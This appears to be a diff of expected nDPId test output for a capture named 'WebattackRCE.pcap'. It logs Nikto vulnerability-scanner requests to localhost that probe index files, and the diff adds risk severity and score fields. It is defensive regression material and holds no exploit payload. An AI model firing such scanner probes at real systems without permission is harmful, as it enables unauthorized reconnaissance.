-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276803,"pkt":"AAAAAAAAAAAAAAAACABFAADGlY9AAEAGpqB\/AAABfwAAAcI6H5C5Ma2+n2Qvb4AYAED+ugAAAQEICp1m+2udZvtrR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276804,"pkt":"AAAAAAAAAAAAAAAACABFAADHUClAAEAG7AV\/AAABfwAAAcI8H5AXCWgXkPGhe4AYAED+uwAAAQEICp1m+2ydZvtsR0VUIC9pbmRleC5waHAzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276806,"pkt":"AAAAAAAAAAAAAAAACABFAADHuG9AAEAGg79\/AAABfwAAAcI+H5DOCYBdLPnSzYAYAED+uwAAAQEICp1m+26dZvtuR0VUIC9pbmRleC5waHA0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276807,"pkt":"AAAAAAAAAAAAAAAACABFAADHnVlAAEAGntV\/AAABfwAAAcJAH5BrmKVmTh6XdYAYAED+uwAAAQEICp1m+2+dZvtvR0VUIC9pbmRleC5waHA1IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276809,"pkt":"AAAAAAAAAAAAAAAACABFAADHz9VAAEAGbFl\/AAABfwAAAcJCH5Dtpvfi4owoVYAYAED+uwAAAQEICp1m+3GdZvtwR0VUIC9pbmRleC5waHA3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276810,"pkt":"AAAAAAAAAAAAAAAACABFAADH5lRAAEAGVdp\/AAABfwAAAcJEH5B9+95hKQN6FIAYAED+uwAAAQEICp1m+3KdZvtyR0VUIC9pbmRleC5odG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276812,"pkt":"AAAAAAAAAAAAAAAACABFAADGlhlAAEAGphZ\/AAABfwAAAcJGH5DYta4lttm384AYAED+ugAAAQEICp1m+3OdZvtzR0VUIC9pbmRleC5odG0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276813,"pkt":"AAAAAAAAAAAAAAAACABFAADI2h9AAEAGYg5\/AAABfwAAAcJIH5At6uIveFvtbIAYAED+vAAAAQEICp1m+3WdZvt1R0VUIC9pbmRleC5zaHRtbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
